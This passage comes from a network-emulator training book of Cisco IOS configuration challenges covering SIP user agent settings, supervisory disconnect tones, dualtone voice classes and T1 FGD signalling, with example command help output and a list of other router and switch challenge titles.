SIP User Agent bind status(signaling): DISABLED
SIP User Agent bind status(media): DISABLED
SIP early-media for 180 responses with SDP: ENABLED
SIP max-forwards : 70
SIP DNS SRV version: 2 (rfc 2782)
NAT Settings for the SIP-UA
Role in SDP: NONE
Check media source packets: DISABLED
Maximum duration for a telephone-event in NOTIFYs: 2000 ms
SIP support for ISDN SUSPEND/RESUME: ENABLED
Redirection (3xx) message handling: ENABLED
NetworkSims.com
1126
Reason Header will override Response/Request Codes: DISABLED

SDP application configuration:
Version line (v=) required
Owner line (o=) required
Timespec line (t=) required
Media supported: audio image
Network types supported: IN
Address types supported: IP4
Transport types supported: RTP/AVP udptl
# show sip-ua register status
Line
peer
expires (sec)
registered
===========================================
4101
20001
120
yes
4102
20005
120
yes

Outline
This challenge involves SIP Voice Service Configuration for hair-pin calls for all dial-peers.
Objectives
Allow hairpinned calls for all dial peers with redirect ip2ip.
Set the IP address for all SIP traffic as the local loopback.
Define that the gateway acts as a registrar server.
Commands
> enable
# config t
(config)# sip-ua
(config-sip-ua)# redirect ip2ip
(config-sip-ua)# sip
(config-sip-ua)# bind control source-interface loopback10
(config-sip-ua)# registrar server expires max 1000 min 500
(config)# exit
# sh sip-ua status
Example
> enable
# config t
(config-sip-ua)# redirect ip2ip
(config-sip-ua)# sip
(config-sip-ua)# bind control source-interface loopback10
(config-sip-ua)# registrar server expires max 1000 min 500
(config)# exit
NetworkSims.com
1127
# sh sip-ua status

SIP Gateway

Outline
This challenge involves configuration of the supervisory tone disconnect
Objectives
Define CP tone.
Define timeouts for wait-release and call-disconnect.
Define supervisory disconnect.
Commands
> enable
# config t
(config-voiceport)# timeouts wait-release 10
(config-voiceport)# timeouts call-disconnect 10
(config-voiceport)# cptone us
(config-voiceport)# supervisory disconnect dualtone mid-call
Example
> enable
# config t
Router(config-voiceport)# ?
battery-reversal
bearer-cap
busyout
caller-id
comfort-noise
connection
NetworkSims.com
1128
cptone
default
description
disc_pi_off
disconnect-ack
echo-cancel
exit
impedance
input
music-threshold
mwi
no
non-linear
output
playout-delay
ren
ring
shutdown
signal
snmp
station-id
supervisory
threshold
timeouts
timing
translate
Translation rule
trunk-group
voice-class
(config-voiceport)# timeouts ?
call-disconnect Call Disconnect Timeout after Destination Hangs Up in
seconds
hookflash-in
Define hookflash-in delay in milliseconds
initial
Initial Timeout duration in seconds
interdigit
Interdigit Timeout duration in seconds
power-denial
Duration for which power-denial is applied
ringing
Ringing no answer timeout duration in seconds
wait-release
Wait release timeout duration in seconds
(config-voiceport)# timeout w ?
<1-3600> seconds
(config-voiceport)# timeouts wait-release 10
(config-voiceport)# timeout call ?
<0-120>
seconds
(config-voiceport)# timeouts call-disconnect 10
(config-voiceport)# cp ?
locale
2 letter ISO-3166 country code
AR
AU
AT
BE
BR
CA
CN
CO
C1
C2
CY
CZ
Argentina
Australia
Austria
Belgium
Brazil
Canada
China
Colombia
Custom1
Custom2
Cyprus
Czech Republic
NetworkSims.com
IS
IN
ID
IE
IL
IT
JP
JO
KE
KR
LB
LU
Iceland
India
Indonesia
Ireland
Israel
Italy
Japan
Jordan
Kenya
Korea Republic
Lebanon
Luxembourg
PE
PH
PL
PT
RU
SA
SG
SK
SI
ZA
ES
SE
Peru
Philippines
Poland
Portugal
Russian Federation
Saudi Arabia
Singapore
Slovakia
Slovenia
South Africa
Spain
Sweden
1129
DK Denmark
MY Malaysia
CH Switzerland
EG Egypt
MX Mexico
TW Taiwan
FI Finland
NP Nepal
TH Thailand
FR France
NL Netherlands
TR Turkey
DE Germany
NZ New Zealand
GB United Kingdom
GH Ghana
NG Nigeria
US United States
GR Greece
NO Norway
VE Venezuela
HK Hong Kong
PK Pakistan
ZW Zimbabwe
HU Hungary
PA Panama
(config-voiceport)# cptone us
(config-voiceport)# su ?
disconnect Configure supervisory disconnect lcfo
(config-voiceport)# supervisory disconnect dualtone mid-call

Outline
This challenge involves customizing the Supervisory Disconnect Tone.
Objectives
Define a tone class.

Apply the tone class for tone details.
Commands
> enable
# config t
(config-voice-port)# supervisory disconnect dualtone pre-connect voice-class 5
(config-voice-port)# exit
(config)# voice class dualtone 5
(cfg-dual-detect)# freq-max-power 20
(cfg-dual-detect)# freq-min-power 10
(cfg-dual-detect)# cadence-variation 10
(cfg-dual-detect)# freq-max-deviation 10
(cfg-dual-detect)# freq-max-delay 10
Example
> enable
# config t
(config-voice-port)# supervisory disconnect dualtone pre-connect voice-class 5
(config-voice-port)# exit
(config)# voice class dualtone 5
(cfg-dual-detect)# ?
VOICECLASS configuration commands:
cadence-variation
Cadence variation allowed
exit
Exit from voice class configuration mode
NetworkSims.com
1130
freq-max-delay
freq-max-deviation
freq-max-power
Timing difference between two frequencies

Maximum frequency deviation allowed for each frequency
Absolute value of upper limit for tone power per
frequency
freq-min-power
Absolute value of lower limit for tone power per
frequency
freq-power-twist
The difference between the power of two frequencies
help
no
(cfg-dual-detect)# freq-max-power ?
<0-20> Unit is dbmO
(cfg-dual-detect)# freq-max-power 20
(cfg-dual-detect)# freq-min-power ?
<10-35> Unit is -dbmO
(cfg-dual-detect)# freq-min-power 10
(cfg-dual-detect)# cadence-variation ?
<0-200> Unit is 10 ms
(cfg-dual-detect)# cadence-variation 10
(cfg-dual-detect)# freq-max-dev ?
<10-125> Unit in Hz
(cfg-dual-detect)# freq-max-deviation 10
(cfg-dual-detect)# freq-max-delay ?
<10-100> Unit is 10 ms
(cfg-dual-detect)# freq-max-delay 10

Outline
This challenge involves configuring FGD for T1.
Objectives
Configure T1 for the linecode (B8ZS) and framing (ESF).

Define E&M-FGD and FGD-ENNA.
Commands
> enable
# config t
(config)# controller
NetworkSims.com
t1
framing esf
linecode b8zs
pri-group timeslots 1-10
no shutdown
clock source line
ds0-group 1 t 1-4 type e&m-fgd
ds0-group 2 t 5-24 type fgd-enna
1131
Example
> enable
# config t
Router(config-controller)# ?
Controller configuration commands:
cablelength
Specify the cable length for a DS1 link
channel-group Specify the timeslots to channel-group mapping for an
interface
clock
Specify the clock source for a DS1 link
default
description
Controller specific description
ds0-group
DS0 time slots that make up a logical voice port
exit
Exit from controller configuration mode
framing
Specify the type of Framing on a DS1 link
help
linecode
Specify the line encoding method for a DS1 link
loopback
Put the entire T1 line into loopback
no
pri-group
Configure the specified timeslots for PRI
shutdown
Shut down a DS1 link (send Blue Alarm)
(config-controller)# framing ?
esf Extended Superframe
sf
Superframe
(config-controller)# linecode ?
ami
AMI encoding
b8zs B8ZS encoding
(config-controller)# pri-group timeslots 1-10
(config-controller)# ds0-group ?
<1-11> ds0-group-number
(config-controller)# ds0-group 1 ?
timeslots number of timeslots
(config-controller)# ds0-group 1 t ?
<1-24> timeslot-list
(config-controller)# ds0-group 1 t 1-4 type ?
e&m-delay-dial
e&m-fgd
e&m-immediate-start
e&m-wink-start
ext-sig
fgd-eana
fxo-ground-start
fxo-loop-start
fxs-ground-start
fxs-loop-start
(config-controller)# ds0-group 1 t 1-4 type e&m-fgd
(config-controller)# ds0-group 2 t 5-24 type fgd-enna

NetworkSims.com
1132
Circuits
NetworkSims.com
1133

Network Emulators

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Network Emulators

Uploaded by

Copyright:

Available Formats

NetworkSims

Cisco Router Challenge 1

Setup the IP address on E0 port.

auto Enable AUTO speed configuration

Cisco Router Challenge 2

Setup the IP address on S0 port.

Transparent bridging interface parameters

Get config from another source

Cisco Router Challenge 3

Setup the name server.

Cisco Router Challenge 4

Setup the domain name.

Cisco Router Challenge 5

Define the hostname.

Cisco Router Challenge 6

Define RIP routing.

Cisco Router Challenge 8

IP address of the logging host

Enable sending ARP requests for syslog servers when

Cisco Router Challenge 9

(config)# cdp run

(config)# cdp holdtime ?

(config)# cdp holdtime 4

Cisco Router Challenge 10

Define the main parameters for the SNMP server.

(config)# smmp-server chassis-ID paris

Cisco Router Challenge 11

Setup the IP address on E0 port.

Cisco Router Challenge 12

Setup the IP address on S1 port.

Cisco Router Challenge 14

Setup the default gateway.

montana (config)# ip host kirkcaldy 154.242.2.8

Cisco Router Challenge 15

Setup settings for CON.

Cisco Router Challenge 16

Setup the local clock.

Cisco Router Challenge 17

This challenge involves the configuration of a standard ACL.

Setup a standard ACL.

permit host 130.152.162.10

Cisco Router Challenge 18

Setup a standard ACL.

deny host 193.68.36.8

Cisco Router Challenge 19

Define an extended ACL.

(config)# access-list 105 ?

Cisco Router Challenge 20

Define a named standard ACL.

Cisco Router Challenge 51

The objectives of this challenge are to:

Remove users from the configuration.

Cisco Router Challenge 52

Remove networks from RIP.

Cisco Router Challenge 53

Get rid of the SNMP-server configurations.

Cisco Router Challenge 58

Cisco Switch Challenge 1

Setup the VLAN address.

Cisco Switch Challenge 2

Setup the console password.

Cisco Switch Challenge 3

Setup a password on the Telnet session.

Cisco Switch Challenge 4